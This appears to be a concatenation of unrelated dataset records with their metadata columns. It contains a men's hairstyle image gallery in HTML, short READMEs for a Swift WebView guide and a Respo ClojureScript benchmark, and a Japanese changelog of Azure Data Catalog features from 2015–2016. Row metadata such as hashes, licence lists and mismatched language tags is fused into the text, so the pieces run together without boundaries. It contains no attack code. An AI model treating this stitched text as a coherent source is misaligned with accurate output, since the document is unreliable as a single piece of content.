<img class="img-fluid" src="https://i0.wp.com/www.menshairstyletrends.com/wp-content/uploads/2018/01/z_ramsey-side-part-hairstyle-timeless-hairstyles-for-men-e1515452170491.jpg" width="100%" onerror="this.onerror=null;this.src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQh_l3eQ5xwiPy07kGEXjmjgmBKBRB7H2mRxCGhv1tFWg5c_mWT';" alt="21 Side Part Haircuts 2020 Styles That Are Cool Modern" />](https://www.menshairstyletrends.com/wp-content/uploads/2018/01/z_ramsey-side-part-hairstyle-timeless-hairstyles-for-men-e1515452170491.jpg)
21 Side Part Haircuts 2020 Styles That Are Cool Modern
[
<img class="img-fluid" src="https://i0.wp.com/i.dmarge.com/2017/01/Mens-Short-Hair-19-of-45.jpg" width="100%" onerror="this.onerror=null;this.src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQh_l3eQ5xwiPy07kGEXjmjgmBKBRB7H2mRxCGhv1tFWg5c_mWT';" alt="52 Best Stylish Short Hairstyles For Men With Photos Tips" />](https://i.dmarge.com/2017/01/Mens-Short-Hair-19-of-45.jpg)
52 Best Stylish Short Hairstyles For Men With Photos Tips
[
<img class="img-fluid" src="https://i0.wp.com/www.mrkidshaircuts.com/wp-content/uploads/2018/01/Side-Swept-Long-Hair-For-Boys.jpg" width="100%" onerror="this.onerror=null;this.src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQh_l3eQ5xwiPy07kGEXjmjgmBKBRB7H2mRxCGhv1tFWg5c_mWT';" alt="110 Cool Haircuts For Boys 2020 Mrkidshaircut Com" />](https://www.mrkidshaircuts.com/wp-content/uploads/2018/01/Side-Swept-Long-Hair-For-Boys.jpg)
110 Cool Haircuts For Boys 2020 Mrkidshaircut Com
[
<img class="img-fluid" src="https://i0.wp.com/manofmany.com/wp-content/uploads/2019/06/50-Long-Haircuts-Hairstyle-Tips-for-Men-Slick-back.jpg" width="100%" onerror="this.onerror=null;this.src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQh_l3eQ5xwiPy07kGEXjmjgmBKBRB7H2mRxCGhv1tFWg5c_mWT';" alt="50 Long Haircuts Hairstyle Tips For Men Man Of Many" />](https://manofmany.com/wp-content/uploads/2019/06/50-Long-Haircuts-Hairstyle-Tips-for-Men-Slick-back.jpg)
50 Long Haircuts Hairstyle Tips For Men Man Of Many
[
<img class="img-fluid" src="https://i0.wp.com/hairstylehub.com/wp-content/uploads/2016/10/asymmetrical-cut.jpg" width="100%" onerror="this.onerror=null;this.src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQh_l3eQ5xwiPy07kGEXjmjgmBKBRB7H2mRxCGhv1tFWg5c_mWT';" alt="30 Best Hairstyles For Men Any Guy Would Love" />](http://hairstylehub.com/wp-content/uploads/2016/10/asymmetrical-cut.jpg)
30 Best Hairstyles For Men Any Guy Would Love | 109.587629 | 542 | 0.781091 | yue_Hant | 0.360132 |
973cc340e54e96d227aac999427586530f039a7e | 50 | md | Markdown | README.md | MobcoderTech/WebView | 83c9c09510ea83a515531bc95e83aa7c5616cd60 | [
"MIT"
] | null | null | null | README.md | MobcoderTech/WebView | 83c9c09510ea83a515531bc95e83aa7c5616cd60 | [
"MIT"
] | 1 | 2017-09-25T17:46:22.000Z | 2017-09-25T17:46:22.000Z | README.md | MobcoderTech/WebView | 83c9c09510ea83a515531bc95e83aa7c5616cd60 | [
"MIT"
] | null | null | null | # WebView
A beginner guide to UIWebView Swift 3.0
| 16.666667 | 39 | 0.78 | kor_Hang | 0.626933 |
973d23099781f9fb50e85049e53896b25e020f9e | 376 | md | Markdown | README.md | Respo/heavy-list | 8285109d8a6653d33fccfcb1b8fce60f4488f276 | [
"MIT"
] | 1 | 2016-10-04T21:37:40.000Z | 2016-10-04T21:37:40.000Z | README.md | Respo/heavy-list | 8285109d8a6653d33fccfcb1b8fce60f4488f276 | [
"MIT"
] | null | null | null | README.md | Respo/heavy-list | 8285109d8a6653d33fccfcb1b8fce60f4488f276 | [
"MIT"
] | null | null | null |
Heavy list in Respo, to test performance
----
Built for https://github.com/krausest/js-framework-benchmark
Demo http://repo.respo.site/heavy-list/
To compile and deploy:
```bash
boot build-advanced
export boot_deps=`boot show -c`
planck -c $boot_deps:src/ -i render.cljs
boot rsync
```
### Develop
Workflow https://github.com/mvc-works/stack-workflow
### License
MIT
| 15.04 | 60 | 0.731383 | kor_Hang | 0.411972 |
973d2cbdb2406046a4563c513f16646577a77281 | 17,941 | md | Markdown | articles/data-catalog/data-catalog-whats-new.md | masamis/azure-docs.ja-jp | f6fb1980bb8ff5ed9f4056f095f0d90f855161c4 | [
"CC-BY-3.0"
] | null | null | null | articles/data-catalog/data-catalog-whats-new.md | masamis/azure-docs.ja-jp | f6fb1980bb8ff5ed9f4056f095f0d90f855161c4 | [
"CC-BY-3.0"
] | null | null | null | articles/data-catalog/data-catalog-whats-new.md | masamis/azure-docs.ja-jp | f6fb1980bb8ff5ed9f4056f095f0d90f855161c4 | [
"CC-BY-3.0"
] | null | null | null | ---
title: "Azure Data Catalog の新機能 | Microsoft Docs"
description: "この記事では、Azure Data Catalog に追加された新機能の概要を説明します。"
services: data-catalog
documentationcenter:
author: steelanddata
manager: NA
editor:
tags:
ms.assetid: 1201f8d4-6f26-4182-af3f-91e758a12303
ms.service: data-catalog
ms.devlang: NA
ms.topic: article
ms.tgt_pltfrm: NA
ms.workload: data-catalog
ms.date: 03/03/2017
ms.author: maroche
translationtype: Human Translation
ms.sourcegitcommit: 1e6ae31b3ef2d9baf578b199233e61936aa3528e
ms.openlocfilehash: ef4517191084148ff3810226c927ee45a61b2c49
ms.lasthandoff: 03/03/2017
---
# <a name="whats-new-in-azure-data-catalog"></a>Azure Data Catalog の新機能
**Azure Data Catalog** の更新プログラムは定期的にリリースされます。 一部のリリースではバックエンド サービス機能に重点を置いているため、すべてのリリースにユーザー向けの新機能が含まれているわけではありません。 ここでは、Azure Data Catalog サービスに追加されたユーザー向けの新機能について説明します。
## <a name="whats-new-for-the-week-of-september-16-2016-release"></a>2016 年 9 月 16 日の週のリリースの新機能
2016 年 9 月 16 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* IBM DB2 データ ソースのサポート。 DB2 のデータベース、テーブル、ビューの登録と検出を実行できるようになりました。
* Azure DocumentDB データ ソースのサポート。 DocumentDB のデータベースとコレクションの登録と検出を実行できるようになりました。
* Data Catalog ポータルでのカタログ名のカスタマイズのサポート。 カタログ管理者が、ポータルのタイトルに表示されるテキスト (組織名など) を指定できるようになりました。
## <a name="whats-new-for-the-week-of-august-26-2016-release"></a>2016 年 8 月 26 日の週のリリースの新機能
2016 年 8 月 26 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* SQL Server マスター データ サービス (MDS) データ ソースの登録のための機能拡張。 Data Catalog データ ソース登録ツールを使用して MDS エンティティを登録する際に、プレビューとデータ プロファイルを含めることができるようになりました。
* 管理者定義の組織用検索条件の保存のサポート。 Data Catalog 管理者が Data Catalog ポータルで検索条件を保存する際に、検索条件を個人用に保存するか、カタログのすべてのユーザー用に保存するかを選択できるようになりました。 組織用に保存した検索条件はカタログのすべてのユーザーに共有され、データ ソース検出の標準化された開始点となります。
## <a name="whats-new-for-the-week-of-august-5-2016-release"></a>2016 年 8 月 5 日の週のリリースの新機能
2016 年 8 月 5 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* Data Catalog ポータルでのプロパティ表示の更新。 すべてのデータ資産のプロパティをサイズ変更可能な&1; つのウィンドウで表示および管理できるようになり、エクスペリエンスの一貫性と検出のしやすさが向上しました。
## <a name="whats-new-for-the-week-of-july-29-2016-release"></a>2016 年 7 月 29 日の週のリリースの新機能
2016 年 7 月 29 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* SQL Server マスター データ サービス (MDS) データ ソースのサポート。 MDS のモデルとエンティティの登録と検出を実行できるようになりました。
## <a name="whats-new-for-the-week-of-july-22-2016-release"></a>2016 年 7 月 22 日の週のリリースの新機能
2016 年 7 月 22 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* SQL Server のストアド プロシージャのサポート。 SQL Server データ ソースのストアド プロシージャ オブジェクトの登録と検出を実行できるようになりました。
* Azure Data Catalog ポータルとデータ ソース登録ツールで対応する言語が追加されました (合計で 18 の言語に対応)。 Azure Data Catalog ユーザー エクスペリエンスは、Windows または Web ブラウザーに指定された言語設定に基づいてローカライズされます。
## <a name="whats-new-for-the-week-of-july-8-2016-release"></a>2016 年 7 月 8 日の週のリリースの新機能
2016 年 7 月 8 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* Data Catalog ポータルのホームページの更新と改良 (パフォーマンスの向上、ユーザー エクスペリエンスの効率化など)。
## <a name="whats-new-for-the-week-of-june-24-2016-release"></a>2016 年 6 月 24 日の週のリリースの新機能
2016 年 6 月 24 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* Data Catalog ポータルでのデータ資産の検出時に、リスト ビュー内の列のサイズ変更をサポート。 タグや説明など、長い資産メタデータの個々の列サイズを変更して、読みやすくできるようになりました。
* Data Catalog ポータルの [開く] メニューへの Power Query for Excel の追加。 Excel 2016、または [Power Query for Excel](https://support.office.com/article/Introduction-to-Microsoft-Power-Query-for-Excel-6E92E2F4-2079-4E1F-BAD5-89F6269CD605) アドインがインストールされている Excel 2010 と Excel 2013 でサポートされているデータ ソースを開けるようになりました。
## <a name="whats-new-for-the-week-of-june-17-2016-release"></a>2016 年 6 月 17 日の週のリリースの新機能
2016 年 6 月 17 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* Azure Table Storage データ ソースのサポート。 Azure Storage データ ソースのテーブル オブジェクトの登録と検出を実行できるようになりました。
## <a name="whats-new-for-the-week-of-may-20-2016-release"></a>2016 年 5 月 20 日の週のリリースの新機能
2016 年 5 月 20 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* Data Catalog ビジネス用語集の機能強化により、ユーザーが&1; 回の操作で複数の用語集の用語を更新できるようになっています。 ユーザーは、複数の用語を選択して次の各フィールドを編集できます。
* 親の用語: 新しい親の用語を選択することができ、選択した用語はいずれも選択した親の用語の子になるように更新されます。 選択したすべての用語が同じ親を持つ場合、その親はテキスト ボックスに表示され、それ以外の場合、親の用語フィールドには空白が設定されます。
* タグと関係者: 複数のデータ資産にタグ付けする場合と同じ操作方法で、複数の用語集の用語に対してタグと関係者を追加および削除できます。
ビジネス用語集の詳細については、「 [管理タグ付け用のビジネス用語集を設定する方法](data-catalog-how-to-business-glossary.md)
## <a name="whats-new-for-the-week-of-may-6-2016-release"></a>2016 年 5 月 6 日の週のリリースの新機能
2016 年 5 月 6 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* カタログ管理者がビジネス用語と階層を定義し、一般的なビジネス語彙を作成できるビジネス用語集。 ユーザーは、登録したデータ資産に用語集の用語でタグを付けて、カタログの内容を検出しやすく、わかりやすくすることができます。 詳細については、「 [管理タグ付け用のビジネス用語集を設定する方法](data-catalog-how-to-business-glossary.md)
> [!NOTE]
> ビジネス用語集は、Azure Data Catalog の Standard Edition でのみ使用できます。 無料エディションには、管理タグ付けまたはビジネス用語集の機能がありません。
>
>
## <a name="whats-new-for-the-week-of-march-11-2016-release"></a>2016 年 3 月 11 日の週のリリースの新機能
2016 年 3 月 11 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* Azure Data Catalog サービスの検索機能およびカタログ資産管理機能にプログラムでアクセスするために統合された REST API エンドポイント。 この検索 API エンドポイントとカタログ API エンドポイントは 2016 年 3 月 21 日に廃止され、提供が終了します。 API のセマンティクスに対する変更はありません。 エンドポイント URI だけが変更されます。 詳細については、[Azure Data Catalog の REST API リファレンス](https://msdn.microsoft.com/library/azure/mt267595.aspx)のページを参照してください。 API サンプルについては、[Azure Data Catalog 開発者向けサンプル](data-catalog-samples.md)のページを参照してください。
## <a name="whats-new-for-the-week-of-february-19-2016-release"></a>2016 年 2 月 19 日の週のリリースの新機能
2016 年 2 月 19 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* Azure Data Catalog データ ソース登録ツールでのデータ ソース選択の操作性が再設計されました。 データ ソース登録ツールが更新され、Azure Data Catalog がサポートするデータ ソースからの特定と選択が簡単になりました。
* Azure Data Catalog ポータルとデータ ソース登録ツールが追加の 10 言語に対応するようになりました。 英語に加え、Azure Data Catalog 環境はドイツ語、スペイン語、フランス語、イタリア語、日本語、韓国語、ポルトガル語 (ブラジル)、ロシア語、簡体字中国語、繁体字中国語で利用できます。 Azure Data Catalog ユーザー エクスペリエンスは、Windows またはユーザーの Web ブラウザーに指定された言語設定に基づいてローカライズされます。
* ビジネス継続性と障害復旧のための Azure Data Catalog データの geo レプリケーションがサポートされるようになりました。 データ ソースのメタデータとクラウドソースの注釈を含むすべての Azure Data Catalog コンテンツが、お客様への追加コストなしで&2; つの Azure リージョン間でレプリケートされるようになりました。 Azure リージョンは、「 [ビジネス継続性と障害復旧 (BCDR): Azure のペアになっているリージョン](../best-practices-availability-paired-regions.md)」に記載された対応表に従い、500 マイル以上離れた Azure リージョンと事前にペアリングされています。
## <a name="whats-new-for-the-week-of-february-5-2016-release"></a>2016 年 2 月 5 日の週のリリースの新機能
2016 年 2 月 5 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* Azure Data Catalog によって使用される Azure サブスクリプションの変更のサポート。 Azure Data Catalog の管理者は、Azure Data Catalog ポータルの [設定] ページを使用して、課金用に別の Azure サブスクリプションを選択できます。
## <a name="whats-new-for-the-week-of-january-29-2016-release"></a>2016 年 1 月 29 日の週のリリースの新機能
2016 年 1 月 29 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* 追加のデータ ソースを手動で登録するためのサポート。 Azure Data Catalog ポータルで [手動エントリの作成] を使用したり、Azure Data Catalog REST API を使用して次のデータ ソースを登録したりできるようになりました。
* OData - 関数、エンティティ セット、エンティティ コンテナー
* HTTP - ファイル、エンドポイント、レポート、サイト
* ファイル システム - ファイル
* SharePoint - リスト
* FTP - ファイル、ディレクトリ
* Salesforce.com - オブジェクト
* DB2 - テーブル、ビュー、データベース
* PostgreSQL - テーブル、ビュー、データベース
* Azure SQL DB と Azure SQL Data Warehouse を含む SQL Server データ ソースに対する "SQL Server Data Tools で開く" のサポート。
> [!NOTE]
> "SQL Server Data Tools で開く" には、Visual Studio 2013 Update 4 と SQL Server Tooling がインストールされている必要があります。 SQL Server Data Tools の最新バージョンをインストールするには、「 [SQL Server Data Tools (SSDT) のダウンロード](https://msdn.microsoft.com/library/mt204009.aspx)」を参照してください。
>
>
## <a name="whats-new-for-the-week-of-january-22-2016-release"></a>2016 年 1 月 22 日の週のリリースの新機能
2016 年 1 月 22 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* SAP HANA のビューおよびパッケージを登録して検出するためのサポート。 Azure Data Catalog データ ソース登録ツールを使用して SAP HANA データ ソースを登録し、Azure Data Catalog ポータルを使用して登録済み SAP HANA データ ソースの注釈付けや検出を行うことができます。
## <a name="whats-new-for-the-week-of-january-8-2016-release"></a>2016 年 1 月 8 日の週のリリースの新機能
2016 年 1 月 8 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* Azure Data Catalog ポータルでデータ資産をピン留め/ピン留め解除する機能。 データ資産のピン留めを選択することで、再検出/再利用しやすくなります。
* Azure Data Catalog ポータルの新たに再設計されたホーム ページ。 新しいホーム ページには、最近公開またはピン留めされた資産、保存された検索など、現在のユーザーのアクティビティに関する詳細な情報のほか、カタログ全体でのアクティビティに関する詳細な情報も含まれています。
* Azure Data Catalog ポータルでの固定のユーザー設定のサポート。 ユーザー エクスペリエンスの設定 (グリッドまたはタイル ビュー、ページあたりの結果の数、検索結果の強調表示のオンまたはオフなど) はユーザー セッション間で永続化されます。
* Azure Data Catalog が、2 つの新しい Azure リージョンで利用できるようになりました。 お客様は Azure Data Catalog を、米国東部、米国西部、西ヨーロッパ、オーストラリア東部に加え、北ヨーロッパおよび東南アジア リージョンでもプロビジョニングできます。 詳細については、「 [Azure のリージョン](https://azure.microsoft.com/regions/)」をご覧ください。
## <a name="whats-new-for-the-week-of-december-18-2015-release"></a>2015 年 12 月 18 日の週のリリースの新機能
2015 年 12 月 18 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* Azure SQL Data Warehouse データ ソースに対するデータ プロファイルのサポート。 Azure SQL Data Warehouse のテーブルとビューを登録するとき、ユーザーはデータ ソースから抽出されたメタデータと共にデータ プロファイル メトリックを含めることができます。
* MySQL のオブジェクトおよびデータベースを登録して検出するためのサポート。 ユーザーは Azure Data Catalog データ ソース登録ツールを使用して MySQL データ ソースを登録し、Azure Data Catalog ポータルを使用して登録済み MySQL データ ソースの注釈付けや検出を行うことができます。
## <a name="whats-new-for-the-week-of-december-4-2015-release"></a>2015 年 12 月 4 日の週のリリースの新機能
2015 年 12 月 4 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* Teradata データ ソース用の SPNEGO および Windows 認証のサポート。 Teradata のテーブルとビューの登録時に、LDAP および TD2 認証だけでなく、SPNEGO および Windows 認証を使用して Teradata に接続することを選択できます。
* Azure Data Lake Store のデータ ソースのサポート。 ユーザーは、Azure Data Catalog を使用して Azure Data Lake Store のデータ ソースを登録および検出できるようになりました。
* Azure Data Catalog データ ソース登録ツールでのネットワーク プロキシ設定の手動指定のサポート。 ユーザーはツールの [ようこそ] ページで [プロキシ設定を変更します] を選択し、ツールで使用されるプロキシ アドレスとポートを指定することができます。
## <a name="whats-new-for-the-week-of-november-20-2015-release"></a>2015 年 11 月 20 日の週のリリースの新機能
2015 年 11 月 20 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* SQL Server (Azure SQL Database を含む) と Oracle データ ソースの Azure Data Catalog ポータルの中から接続文字列の表示とコピーを行う機能。 SQL Server または Oracle のテーブル、ビュー、またはデータベースの接続情報に含まれる [接続文字列の表示] リンクをクリックすることで、データ ソースに接続するために使用される接続文字列を確認できます。 SQL Server データ ソースには、ADO.NET、ODBC、OLEDB、および JDBC 接続文字列があります。 Oracle データ ソースには、ODBC および OLEDB 接続文字列があります。
* Teradata のテーブルとビューの登録時にデータ プロファイルを含めることのサポート。
* SQL Server (Azure SQL DB と Azure SQL Data Warehouse を含む)、Server Analysis Services、Azure Storage、および HDFS ソースに対する [Power BI Desktop で開く] のサポート。
> [!NOTE]
> [Power BI Desktop で開く] を使用するには、Power BI Desktop アプリケーションの現在のバージョンをインストールしておく必要があります。 この機能を使用して問題やエラーが発生した場合は、[PowerBI.com](https://powerbi.com) から提供される Power BI Desktop の最新バージョンを使用していることを確認してください。
>
>
## <a name="whats-new-for-the-week-of-november-13-2015-release"></a>2015 年 11 月 13 日の週のリリースの新機能
2015 年 11 月 13 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* Teradata データ ソース用の LDAP 認証のサポート。 Teradata のテーブルとビューの登録時に、TD2 認証ではなく LDAP 認証を使用して Teradata に接続することを選択できます。
* Teradata データ ソースに対する [Excel で開く] のサポート。
* Azure Data Catalog ポータルでの最近検索した語句のサポート。 ポータルで検索するときに、最近使用した検索語句から選択することで、検索時間を短縮できます。
## <a name="whats-new-for-the-week-of-november-6-2015-release"></a>2015 年 11 月 6 日の週のリリースの新機能
2015 年 11 月 6 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* Teradata データ ソースのプレビューのサポート。 Teradata のテーブルとビューを登録するとき、ユーザーはデータ ソースから抽出されたメタデータのスナップショット レコードを含めることができます。
* Azure SQL Data Warehouse データ ソースに対する [Excel で開く] のサポート。
* 手動で登録されたデータ資産に対する列レベルのスキーマの定義と編集のサポート。 Azure Data Catalog ポータルを使用してデータ資産を手動で作成した後、ユーザーはデータ資産のプロパティで列定義を追加できます。
* Azure Data Catalog を検索するときの "has" クエリのサポート。これにより、特定のメタデータを持つ登録済みデータ資産を検索できます。 Azure Data Catalog のクエリ構文には次のものが含まれるようになりました。
| クエリ構文 | 目的 |
| --- | --- |
| `has:previews` |プレビューを含むデータ資産を検索します。 |
| `has:documentation` |ドキュメントが提供されているデータ資産を検索します。 |
| `has:tableDataProfiles` |テーブル レベルのデータ プロファイル情報でデータ資産を検索します。 |
| `has:columnsDataProfiles` |列レベルのデータ プロファイル情報でデータ資産を検索します。 |
## <a name="whats-new-for-the-week-of-october-30-2015-release"></a>2015 年 10 月 30 日の週のリリースの新機能
2015 年 10 月 30 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* 登録済みのデータ ソースデータに関するデータ プレビューおよびデータ プロファイルの保存時に暗号化をサポートします。 Azure Data Catalog では、サービスに登録されたデータ ソースの任意のプレビュー レコードおよびデータ プロファイルを透過的に暗号化し、Catalog 管理者がキーを管理する必要はありません。
## <a name="whats-new-for-the-week-of-october-23-2015-release"></a>2015 年 10 月 23 日の週のリリースの新機能
2015 年 10 月 23 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* Teradata データ ソースのサポート。 Teradata のテーブルとビューの登録と検出を実行できるようになりました。
> [!NOTE]
> 現在のリリースでは、Teradata TD2 認証のみがサポートされています。 今後、他の認証メカニズムもサポートされる予定です。
>
>
## <a name="whats-new-for-the-week-of-october-16-2015-release"></a>2015 年 10 月 16 日の週のリリースの新機能
2015 年 10 月 16 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* オンプレミス Hive データ ソースのサポート。 ユーザーは、Hadoop オンプレミス データ ソースで Apache Hive 用の Hive テーブルを登録し、検出できるようになりました。
* Azure Data Catalog ポータルにおける保存された検索のサポート。 ユーザーは検索語句とフィルター選択項目を保存することで、簡単に以前の検索を繰り返し、カタログのコンテンツの便利なビューを定義することができます。 また、ユーザーは既定の検索として保存した検索をマークすることもできます。 ユーザーが Azure Data Catalog ポータルのホーム ページまたは [概要] ページから "虫眼鏡" の検索アイコンをクリックすると、既定値としてフラグが付けられた保存した検索が直接示されます。
## <a name="whats-new-for-the-week-of-october-9-2015-release"></a>2015 年 10 月 9 日の週のリリースの新機能
2015 年 10 月 9 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* Azure Data Catalog ポータルで、登録済みのデータ資産とコンテナーに関するリッチ テキスト ドキュメントがサポートされるようになりました。 ユーザーは、タグや説明が不十分なシナリオで、データ資産 (テーブル、ビュー、レポートなど) とコンテナー (データベース、モデルなど) に関するドキュメントを提供できます。
## <a name="whats-new-for-the-week-of-october-2-2015-release"></a>2015 年 10 月 2 日の週のリリースの新機能
2015 年 10 月 2 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* 既知のデータ ソースの種類を手動で登録できるようになりました。 ユーザーは、Azure Data Catalog でサポートされるすべてのデータ ソースの種類について、Azure Data Catalog ポータルを使用してデータ ソース情報を手動で入力できます。
* Azure Active Directory セキュリティ グループを承認できるようになりました。 カタログ管理者は、ユーザー アカウントだけでなく、セキュリティ グループに対するカタログ アクセスを有効にできます。これにより、Azure Data Catalog へのアクセスの管理がより簡単になります。
* Azure Data Catalog ポータルから、Excel で Hive データ ソースを開けるようになりました。
> [!NOTE]
> Hive データ ソースを "Excel で開く" 機能を使用するには、ユーザーが Hive 用の ODBC ドライバーをインストール済みである必要があります。
>
>
## <a name="whats-new-for-the-week-of-september-25-2015-release"></a>2015 年 9 月 25 日の週のリリースの新機能
2015 年 9 月 25 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* Hive データ ソースの登録時に、データ プロファイルを含めることができるようになりました。
* Catalog API のプログラムによる検出がサポートされるようになったため、Azure Data Catalog とアプリケーションの統合が容易になります。
## <a name="whats-new-for-the-week-of-september-18-2015-release"></a>2015 年 9 月 18 日の週のリリースの新機能
2015 年 9 月 18 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* Azure Data Catalog ポータルでの新しい "概要" データ ソースの検出エクスペリエンス。 ユーザーが Azure Data Catalog ポータルの [検出] ページで検索語句を入力していない場合、最も頻繁に使用されるタグ、エキスパート、データ ソースの種類、およびオブジェクトの種類を含むカタログ コンテンツの概要が示されます。
* Azure SQL Data Warehouse のオブジェクトおよびデータベースを登録して検出するためのサポート。 Azure SQL Data Warehouse の詳細については、「 [SQL Data Warehouse](https://azure.microsoft.com/services/sql-data-warehouse/)」を参照してください。
* SQL Server Analysis Services モデルおよび SQL Server Reporting Services サーバーをコンテナーとして登録して検出するためのサポート。 SSAS および SSRS のオブジェクトの登録時に、Azure Data Catalog は、レポートや他のオブジェクトだけでなく、SSAS モデルと SSRS サーバーのエントリも作成します。 コンテナーは、Azure Data Catalog ポータルを使用して検出し、注釈を付けることができます。 カタログのコンテンツを検索し、フィルター処理するだけでなく、モデルまたはサーバーのコンテンツを検索し、フィルター処理することもできます。
> [!NOTE]
> 9 月 18 日のリリースより前に登録された SSAS および SSRS のオブジェクトについては、モデルまたはサーバーのエントリをカタログに追加する前に、データ ソース登録ツールを使用して再登録する必要があります。 データ ソースを再登録しても、Azure Data Catalog ポータルでユーザーによって追加された注釈に影響はありません。
>
>
## <a name="whats-new-for-the-week-of-september-11-2015-release"></a>2015 年 9 月 11 日の週のリリースの新機能
2015 年 9 月 11 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* HTTP/HTTPS を介した SQL Server Analysis Services オブジェクトの登録および検出をサポートします。 ユーザーは、サーバー名ではなく URL (https://servername/olap/msmdpump.dll など) を使用して SSAS サーバーに接続できるようになりました。さらに、Windows 認証に加えて、基本認証と匿名接続も使用することができます。 SSAS への HTTP/HTTPS 接続の詳細については、「[インターネット インフォメーション サービス (IIS)&8;.0 上の Analysis Services への HTTP アクセスの構成](https://msdn.microsoft.com/library/gg492140.aspx)」を参照してください。
* HDInsight で Hive データ ソースをサポートします。 ユーザーは、HDInsight データ ソースにおいて、Hadoop の Apache Hive に対する Hive テーブルを登録および検出できるようになりました。 HDInsight での Hive の詳細については、 [HDInsight ドキュメント センター](../hdinsight/hdinsight-use-hive.md)をご覧ください。
* Oracle データベースと HDFS クラスターをコンテナーとして登録し、検出できるようになりました。 Oracle のテーブルとビューまたは HDFS の登録時に、Azure Data Catalog は、データベース、テーブル、およびビューのエントリを作成します。 データベースは、Azure Data Catalog ポータルを使用して検出し、注釈を付けることができます。 カタログのコンテンツを検索し、フィルター処理するだけでなく、データベースまたはクラスターのコンテンツを検索し、フィルター処理することもできます。
> [!NOTE]
> 9 月 11 日以前に登録された Oracle のテーブルおよびビューと、HDFS のファイルおよびディレクトリについては、データベースまたはクラスターのエントリをカタログに追加する前に、データ ソース登録ツールで再登録する必要があります。 データ ソースを再登録しても、Azure Data Catalog ポータルでユーザーによって追加された注釈に影響はありません。
>
>
## <a name="whats-new-for-the-week-of-september-4-2015-release"></a>2015 年 9 月 4 日の週のリリースの新機能
2015 年 9 月 4 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* 不明なデータ ソースを手動で登録できるようになりました。 データ ソース登録ツールで明示的にサポートされていないデータ ソースに注釈を付け、検出できるように、Azure Data Catalog ポータルを使用してデータ ソース情報を手動で入力できます。
* SQL Server データベースをコンテナーとして登録し、検出できるようになりました。 SQL Server のテーブルとビューの登録時に、Azure Data Catalog は、データベース、テーブル、およびビューのエントリを作成します。 データベースは、Azure Data Catalog ポータルを使用して検出し、注釈を付けることができます。 カタログのコンテンツを検索し、フィルター処理するだけでなく、データベースのコンテンツを検索し、フィルター処理することもできます。
> [!NOTE]
> 9 月 4 日以前に登録された SQL Server のテーブルとビューについては、データベース エントリをカタログに追加する前に、データ ソース登録ツールで再登録する必要があります。 データ ソースを再登録しても、Azure Data Catalog ポータルでユーザーによって追加された注釈に影響はありません。
>
>
## <a name="whats-new-for-the-week-of-august-28-2015-release"></a>2015 年 8 月 28 日の週のリリースの新機能
2015 年 8 月 28 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* SQL Server と Oracle のデータ ソースのデータプロファイルのサポート。 SQL Server と Oracle のテーブルとビューを登録するときに、登録するオブジェクトのデータ プロファイル情報を含めることを選択できます。 データ プロファイルには、オブジェクト レベルと列レベルの統計情報が含まれます。
* Hadoop HDFS データ ソースのサポート。 HDFS のファイルとディレクトリを登録および検出できるようになりました。
## <a name="whats-new-for-the-week-of-august-21-2015-release"></a>2015 年 8 月 21 日の週のリリースの新機能
2015 年 8 月 21 日の週の時点で、Azure Data Catalog には次の機能が追加されています。
* 登録されているデータ ソースに対するアクセス要求情報の提供のサポート。 任意の登録済みデータ資産について、ユーザーは電子メール リンクや URL などのアクセス要求方法を提供し、既存のツールおよびプロセスと簡単に統合できます。
* 登録されているデータ資産に対してどのようなユーザーがどのようなメタデータを提供したのかを簡単に検出できるようにするための、タグとエキスパートに関するヒント。
* 上部のナビゲーション バーに新しい [ユーザー] ボタンとメニューを追加しました。 このメニューを使用すると、ユーザーは Azure Data Catalog へのログオンに使用したアカウントを確認でき、必要な場合はサインアウトできます。 このメニューでは、Azure Data Catalog REST API を使用する開発者に役に立つカタログ名も表示されます。
* Standard Edition のみ: データ資産に所有者を追加するとき、Azure Data Catalog は所有者としてユーザー アカウントとセキュリティ グループの両方をサポートするようになりました。 選択したデータ資産の所有者としてセキュリティ グループを追加する場合、グループの表示名またはグループの UPN 電子メール アドレス (ある場合) のいずれかを入力できます。
* Azure BLOB Storage データ ソースのサポート。 ユーザーは、Azure Storage の BLOB およびディレクトリを登録および検出できるようになりました。
| 63.39576 | 398 | 0.809598 | yue_Hant | 0.768125 |
973dc93ef9a7bf83149d4107d2927fb46ad61200 | 5,225 | md | Markdown | docs/t-sql/xml/query-method-xml-data-type.md | AndersUP/sql-docs | 3457f10fee7c7e8969300a549023a8f39dbe57b0 | [
"CC-BY-4.0",
"MIT"
